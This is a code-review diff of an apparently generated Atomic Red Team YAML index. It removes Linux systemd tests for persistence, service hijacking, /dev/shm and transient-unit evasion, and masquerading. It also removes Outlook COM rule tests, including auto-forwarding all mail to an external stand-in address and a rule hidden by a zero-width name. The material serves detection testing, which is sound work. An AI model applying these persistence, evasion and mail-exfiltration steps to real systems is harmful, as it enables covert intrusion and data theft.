supported_platforms:
- linux
input_arguments:
service_path:
description: Full path to the service file to be written in /tmp
type: path
default: "/tmp/atomic_tmp.service"
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "id > /tmp/atomic_tmp_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: "/tmp must exist and be writable\n"
prereq_command: 'if [ -d "/tmp" ] && [ -w "/tmp" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "/tmp does not exist or is not writable on this
system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > #{service_path}
echo "Description=Atomic Tmp Service" >> #{service_path}
echo "" >> #{service_path}
echo "[Service]" >> #{service_path}
echo "ExecStart=#{command_to_run}" >> #{service_path}
echo "" >> #{service_path}
echo "[Install]" >> #{service_path}
echo "WantedBy=multi-user.target" >> #{service_path}
systemctl link #{service_path}
systemctl start $(basename #{service_path})
systemctl status $(basename #{service_path})
cleanup_command: |
systemctl stop $(basename #{service_path}) 2>/dev/null || true
rm -f #{service_path}
rm -f /tmp/atomic_tmp_output.txt
- name: Create systemd Service Unit from /dev/shm (Unusual Location)
auto_generated_guid: dce49381-a26b-4d95-bdfa-c607ffe8bee5
description: |
Creates a systemd service unit file in /dev/shm and loads it using systemctl.
/dev/shm is a memory-backed filesystem that is world-writable on most Linux systems
and does not persist across reboots, making it particularly attractive to adversaries
seeking to execute transient payloads while evading file-based forensic detection.
This technique has been observed in post-exploitation scenarios where attackers
deliberately avoid writing to disk-backed locations to limit forensic artefacts.
supported_platforms:
- linux
input_arguments:
service_path:
description: Full path to the service file to be written in /dev/shm
type: path
default: "/dev/shm/atomic_shm.service"
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "whoami > /tmp/atomic_shm_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: "/dev/shm must exist and be writable\n"
prereq_command: 'if [ -d "/dev/shm" ] && [ -w "/dev/shm" ]; then exit 0; else
exit 1; fi
'
get_prereq_command: 'echo "/dev/shm does not exist or is not writable on this
system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > #{service_path}
echo "Description=Atomic SHM Service" >> #{service_path}
echo "" >> #{service_path}
echo "[Service]" >> #{service_path}
echo "ExecStart=#{command_to_run}" >> #{service_path}
echo "" >> #{service_path}
echo "[Install]" >> #{service_path}
echo "WantedBy=multi-user.target" >> #{service_path}
systemctl link #{service_path}
systemctl start $(basename #{service_path})
systemctl status $(basename #{service_path})
cleanup_command: |
systemctl stop $(basename #{service_path}) 2>/dev/null || true
rm -f #{service_path}
rm -f /tmp/atomic_shm_output.txt
- name: Modify Existing systemd Service to Execute Malicious Command
auto_generated_guid: 6123928f-6389-4914-8d25-a5d69bd657fa
description: |
Creates a service unit file that initially runs a benign command, then modifies the
ExecStart directive using sed to substitute a malicious command before reloading and
restarting the service. Adversaries may hijack existing services to blend in with normal
service activity and avoid triggering detections focused solely on new service creation.
This technique reflects the tradecraft observed in more sophisticated intrusions where
blending into existing process trees is a priority over creating net-new services.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the service to create and then modify for the test
type: string
default: atomic-modify-test
malicious_command:
description: Malicious command to substitute into ExecStart
type: string
default: /bin/bash -c "echo hijacked > /tmp/atomic_hijack_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'sed must be available on the system
'
prereq_command: 'if [ -x "$(command -v sed)" ]; then exit 0; else exit 1;
fi
'
get_prereq_command: 'apt-get install -y sed 2>/dev/null || yum install -y
sed 2>/dev/null || echo "Could not install sed automatically."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Legitimate Looking Service" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=/bin/true" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
sed -i 's|ExecStart=.*|ExecStart=#{malicious_command}|' /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_hijack_output.txt
- name: Execute Command via Transient systemd Service (systemd-run)
auto_generated_guid: a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236
description: |
Uses systemd-run to execute a command as a transient systemd service without creating
a persistent unit file on disk. Adversaries may use systemd-run to execute arbitrary
commands under the context of systemd while bypassing controls that monitor for new
unit file creation, since transient services exist only in memory for their lifetime.
This is a particularly stealthy technique as it leaves minimal on-disk artefacts and
the service disappears from systemctl list-units once execution completes.
supported_platforms:
- linux
input_arguments:
unit_name:
description: Name of the transient systemd unit to create
type: string
default: atomic-transient
command_to_run:
description: Command to execute as a transient service
type: string
default: /bin/bash -c "id > /tmp/atomic_transient_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemd-run must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi
'
get_prereq_command: 'echo "systemd-run is not available. Ensure systemd is
installed and up to date."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
systemd-run --unit=#{unit_name} --wait #{command_to_run}
systemctl status #{unit_name}.service 2>/dev/null || echo "Transient service has already completed and exited."
cleanup_command: |
systemctl stop #{unit_name}.service 2>/dev/null || true
rm -f /tmp/atomic_transient_output.txt
- name: Enumerate All systemd Services Using systemctl
auto_generated_guid: 1e5be8d4-605a-4acb-8709-2f80b2d8ea95
description: |
Enumerates all systemd services and their current states using systemctl list-units
and systemctl list-unit-files. Adversaries may enumerate running and enabled services
to identify targets for hijacking, understand the host environment, map installed
security tooling, or identify gaps in monitoring coverage.
Service enumeration is a common reconnaissance step during post-exploitation and may
precede service hijacking or masquerading activity. This test does not require
elevation as service listing is available to unprivileged users on most Linux systems.
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
executor:
name: sh
elevation_required: false
command: |
systemctl list-units --type=service --all
systemctl list-unit-files --type=service
cleanup_command: 'echo "No cleanup required"
'
- name: Enable systemd Service for Persistence with Auto-Restart
auto_generated_guid: 2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7
description: |
Creates a payload script and a systemd service unit that executes it, then enables
the service to survive reboots using systemctl enable. The service is configured with
Restart=always to automatically restart on failure, mimicking the persistence mechanism
used by adversaries deploying backdoors or beacons on Linux hosts.
This technique is consistent with observed post-exploitation tradecraft where adversaries
establish a foothold that survives reboots and self-heals after interruption, complicating
incident response and remediation efforts.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the persistence service to create
type: string
default: atomic-persist
payload_path:
description: Path to the payload script that the service will execute
type: path
default: "/tmp/atomic_payload.sh"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
- description: 'Payload script must exist at the specified path
'
prereq_command: 'if [ -f "#{payload_path}" ]; then exit 0; else exit 1; fi
'
get_prereq_command: |
echo '#!/bin/bash' > #{payload_path}
echo 'echo persistent >> /tmp/atomic_persist_output.txt' >> #{payload_path}
chmod +x #{payload_path}
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Atomic Persistence Service" >> /etc/systemd/system/#{service_name}.service
echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=#{payload_path}" >> /etc/systemd/system/#{service_name}.service
echo "Restart=always" >> /etc/systemd/system/#{service_name}.service
echo "RestartSec=10" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl enable #{service_name}.service
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
rm -f /etc/systemd/system/multi-user.target.wants/#{service_name}.service
systemctl daemon-reload
rm -f #{payload_path}
rm -f /tmp/atomic_persist_output.txt
- name: Masquerade Malicious Service as Legitimate System Service
auto_generated_guid: 6fec8560-ff64-4bbf-bc79-734fea48f7ca
description: |
Creates a systemd service with a name and description closely resembling a legitimate
system service to blend in with normal service activity. Adversaries may deliberately
choose service names similar to well-known system services such as systemd-networkd,
cron, or ssh to evade detection from analysts reviewing service lists or automated
alerting on service names.
This masquerading technique is particularly effective in environments where detection
relies on service name allowlists or manual review of systemctl list-units output
rather than behavioural analysis of service unit file contents and ExecStart paths.
supported_platforms:
- linux
input_arguments:
masquerade_name:
description: Service name designed to closely mimic a legitimate system
service
type: string
default: systemd-network-helper
command_to_run:
description: Command the masquerading service will execute
type: string
default: /bin/bash -c "echo masquerade > /tmp/atomic_masquerade_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
- description: 'Chosen masquerade service name must not already exist as a real
service
'
prereq_command: 'if ! systemctl list-unit-files --type=service | grep -q "^#{masquerade_name}.service";
then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "A service named #{masquerade_name} already exists.
Change the masquerade_name input argument to avoid conflicts."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{masquerade_name}.service
echo "Description=Network connectivity helper service" >> /etc/systemd/system/#{masquerade_name}.service
echo "After=network.target" >> /etc/systemd/system/#{masquerade_name}.service
echo "Before=network-online.target" >> /etc/systemd/system/#{masquerade_name}.service
echo "" >> /etc/systemd/system/#{masquerade_name}.service
echo "[Service]" >> /etc/systemd/system/#{masquerade_name}.service
echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{masquerade_name}.service
echo "Restart=on-failure" >> /etc/systemd/system/#{masquerade_name}.service
echo "RestartSec=5" >> /etc/systemd/system/#{masquerade_name}.service
echo "" >> /etc/systemd/system/#{masquerade_name}.service
echo "[Install]" >> /etc/systemd/system/#{masquerade_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{masquerade_name}.service
systemctl daemon-reload
systemctl start #{masquerade_name}.service
systemctl status #{masquerade_name}.service
cleanup_command: |
systemctl stop #{masquerade_name}.service 2>/dev/null || true
systemctl disable #{masquerade_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{masquerade_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_masquerade_output.txt
atomic_tests: []
T1059.009:
technique:
type: attack-pattern
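Review bot: `identifier: T1569.003` and all eight systemctl tests under it are dropped and only `atomic_tests: []` is left, so the T1569.003 entry now has no identifier line at all. An empty list together with a missing identifier reads as the generator failing to resolve this technique rather than a deliberate removal; please check the conversion against the per-technique YAML before merging. If these tests are later restored, note a cleanup gap visible in the removed lines: the `/tmp` and `/dev/shm` tests register the unit with `systemctl link #{service_path}` but their `cleanup_command` only runs `systemctl stop` and `rm -f #{service_path}`, so the symlink that `link` placed in /etc/systemd/system is left dangling and no `systemctl daemon-reload` follows; a `systemctl disable $(basename #{service_path})` (which undoes `link`) followed by `systemctl daemon-reload` would leave the host clean.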
@@ -61783,6 +60810,20 @@ persistence:
3. Click 'Select'
name: manual
- name: Chrome/Chromium (Chrome Web Store)
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- linux
- windows
- macos
executor:
steps: |
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
name: manual
- name: Firefox
auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
description: 'Create a file called test.wma, with the duration of 30 seconds
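Review bot: the added manual test `Chrome/Chromium (Chrome Web Store)` gives install steps but no removal guidance, so a run leaves the "Minimum Viable Malicious Extension" installed in the browser profile. Since the executor is `manual`, a cleanup would also be a step list; add one (for example, remove the extension from chrome://extensions) so the test is reversible in the same way the other tests in this file are via their `cleanup_command`. The description at `description: Install the ...` would also benefit from one sentence on what the extension actually does once installed, so an operator knows what artefact to look for.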
@@ -61893,7 +60934,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
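Review bot: `name` changes from `'Office Application Startup: Outlook Rules'` to `Outlook Rules` while `modified` (`'2025-10-24T17:48:41.026Z'`) and the rest of the ATT&CK object stay as they were. Because this name is derived from the upstream ATT&CK object, either keep the full display name or document the conversion's naming rule (bare sub-technique name, parent prefix stripped) so the change is recognisably intentional and consumers that key on the full name can be adjusted.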
@@ -61914,410 +60955,7 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests:
- name: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
auto_generated_guid: ffadc988-b682-4a68-bd7e-4803666be637
description: |
Creates a malicious Outlook rule via the COM object that permanently deletes
emails when an email with a specific subject keyword arrives. Simulates
adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently
action as it does not require a resolved Exchange folder unlike MoveToFolder.
NOTE: olRuleActionStartApplication cannot be created programmatically per
Microsoft's Rules object model - DeletePermanently is used as the supported
equivalent that generates the same rule-creation artefact.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the malicious Outlook rule
type: string
default: AtomicTest_T1137005_SubjectTrigger
trigger_subject:
description: Email subject keyword that triggers the rule
type: string
default: atomic-rt-trigger
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$cond = $rule.Conditions.Subject
$cond.Enabled = $true
$cond.Text = @("#{trigger_subject}")
$action = $rule.Actions.DeletePermanently
$action.Enabled = $true
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rule - Sender Address Trigger with DeletePermanently Action via
COM Object
auto_generated_guid: bddfd8d4-7687-4971-b611-50a537ab3ab4
description: |
Creates an Outlook rule via COM that permanently deletes emails received
from a specific sender address. Adversaries use sender-based triggers to
make rules appear more legitimate (e.g. disguised as a filter for a
specific colleague). Tests a different rule condition path through the
COM object model. Uses DeletePermanently as it does not require a resolved
Exchange folder unlike MoveToFolder.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the malicious Outlook rule
type: string
default: AtomicTest_T1137005_SenderTrigger
trigger_sender:
description: Sender email address that triggers the rule
type: string
default: atomictest@redteam.local
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$cond = $rule.Conditions.From
$cond.Enabled = $true
$cond.Recipients.Add("#{trigger_sender}")
$cond.Recipients.ResolveAll() | Out-Null
$action = $rule.Actions.DeletePermanently
$action.Enabled = $true
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rule - Auto-Forward Emails to External Address via COM Object
auto_generated_guid: b0bd3d76-a57c-4699-83f4-8cd798dd09bd
description: |
Creates an Outlook rule that automatically forwards all received emails to
an external address. Simulates Business Email Compromise (BEC) and insider
threat scenarios where adversaries establish forwarding rules to exfiltrate
mail. One of the most commonly observed real-world abuses of Outlook rules.
Detected by Exchange mail flow anomalies and Microsoft Secure Score
forwarding alerts.
NOTE: No actual email is forwarded during this test - the rule is created
but a trigger email is not sent. Run cleanup immediately after verification.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the forwarding rule
type: string
default: AtomicTest_T1137005_ForwardExfil
forward_to_address:
description: Email address to forward mail to (use a controlled test address)
type: string
default: atomictest-exfil@redteam.local
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$action = $rule.Actions.Forward
$action.Enabled = $true
$action.Recipients.Add("#{forward_to_address}")
$action.Recipients.ResolveAll() | Out-Null
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of forwarding rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
auto_generated_guid: 5ff5249a-5807-480e-ab52-c430497a8a25
description: |
Enumerates all Outlook rules configured on the local profile using the
PowerShell COM object. Simulates the discovery phase where an adversary
audits existing rules before implanting their own, or where a threat actor
tool such as Ruler lists rules to understand the environment. This
enumeration should itself generate telemetry - use it to validate that
your monitoring catches PowerShell spawning Outlook COM for recon purposes.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$rules = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()
Write-Host "`n[*] Enumerating Outlook rules on local profile..."
Write-Host " Total rules found: $($rules.Count)`n"
for ($i = 1; $i -le $rules.Count; $i++) {
$r = $rules.Item($i)
Write-Host " Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
}
if ($rules.Count -eq 0) {
Write-Host " (No rules configured)"
}
cleanup_command: 'Write-Host "[*] No cleanup required for enumeration test."
'
- name: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
auto_generated_guid: cb814cf8-24f2-41dc-a1cd-1c2073276d4a
description: |
Creates an Outlook rule with a zero-width space as its display name,
making it appear blank and invisible in the standard Outlook Rules UI.
Simulates the hidden inbox rule technique documented by Damian Pfammatter
(2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI
editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear
during casual rule auditing. Tests whether monitoring catches rules that
are invisible in the Outlook GUI but detectable via MFCMapi or
Get-InboxRule on Exchange. Uses PlaySound action as RunApplication
cannot be created programmatically per Microsoft's Rules object model.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
NOTE: Script is written to a temp file before execution to prevent the
ART executor's quote-wrapping from mangling the zero-width space bytes.
supported_platforms:
- windows
input_arguments:
trigger_subject:
description: Subject keyword to trigger the hidden rule
type: string
default: atomic-rt-hidden
sound_file_path:
description: Path to .wav file used as the rule action payload indicator
type: string
default: C:\Windows\Media\notify.wav
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
- description: Sound file must exist for PlaySound action
prereq_command: 'if (Test-Path "#{sound_file_path}") { exit 0 } else { exit
1 }
'
get_prereq_command: |
Write-Host "[-] Sound file not found at #{sound_file_path}"
Write-Host " Specify a valid .wav file path in the sound_file_path input argument."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
$lines = @(
'$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
'$outlook = New-Object -ComObject Outlook.Application',
